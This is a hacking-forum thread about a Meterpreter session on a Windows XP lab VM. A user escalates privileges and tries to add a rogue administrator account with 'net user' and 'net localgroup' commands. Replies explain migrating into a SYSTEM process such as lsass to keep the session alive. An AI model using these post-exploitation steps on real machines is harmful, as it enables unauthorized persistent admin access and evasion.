Jump to content

Adding New User In Windows From A Meterpreter Shell


bobbyb1980
 Share

Recommended Posts

Hey guys. Having a problem adding a new user for an experiment I'm doing. I'm using a Windows XP SP2 vmware machine for the victim and everything is being done via meterpreter.

Once I get the shell opened, I can successfully run the getsystem command and getsystem privs. I then want to drop into a system shell and run the following commands:

C:\ net user pwned pwned /add
C:\ net localgroup admin pwned /add

The goal is to start from a limited user account, escalate the privs, then drop into a system shell to add a new administrator account. The problem is that whenever I drop into a system shell it's still giving me the shell but only with limited user privs. Can't add any admin's with limited user privs.

I've also tried this by adding users via various meterpreter scripts (edited getgui.rb to only add a user and add it to the admin group) but I think the same thing is happening and it's ultimately failing.

Any ideas what's going on here?

Link to comment
Share on other sites

what level of access are you getting through your exploit? In meterpreter run getuid to find out. If you aren't system you can use getsystem to promote yourself to system, from there what you are trying should work as I do it all the time on tests.

Link to comment
Share on other sites

msf  exploit(handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: PYTH0N-AC2CB74D\LIMITED
meterpreter > getsystem
...got system (via technique 4).
meterpreter > shell
Process 224 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>net user pwned /add                                                                               
System error 5 has occurred.

Access is denied.


C:\Program Files\Mozilla Firefox>

Link to comment
Share on other sites

Could be something as stupid as a time synchronization issue with the XP VM. Try stopping and starting the windows time service and make sure windows can connect to the internet to sync.

Link to comment
Share on other sites

Solved. The problem had to do with migration.

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with.

After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

Link to comment
Share on other sites

Solved. The problem had to do with migration.

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with.

After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

That makes sense now.

Link to comment
Share on other sites

Solved. The problem had to do with migration.

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with.

Aer the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

Without proper privelege you won't go very far. Glad you got it sorted.

Link to comment
Share on other sites

Solved. The problem had to do with migration.

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with.

After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

That's what I was going to say.

It's always a good idea to migrate anyway since your connection is relying on the user not closing the process your attached to. Once your in jump over to lsass and you should be golden unless they shut the system down. I believe lsass will even work if the user logs out. I use to use explorer but that depends on the uid of the logged on user and if they log out your screwed. Or explorer crashes. That never happens in Windows does it :-). Just don't use winlogon. For some reason half of the times I try it crashes and when you loose that process the system blue screens. Unless that’s what your going for ;-)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...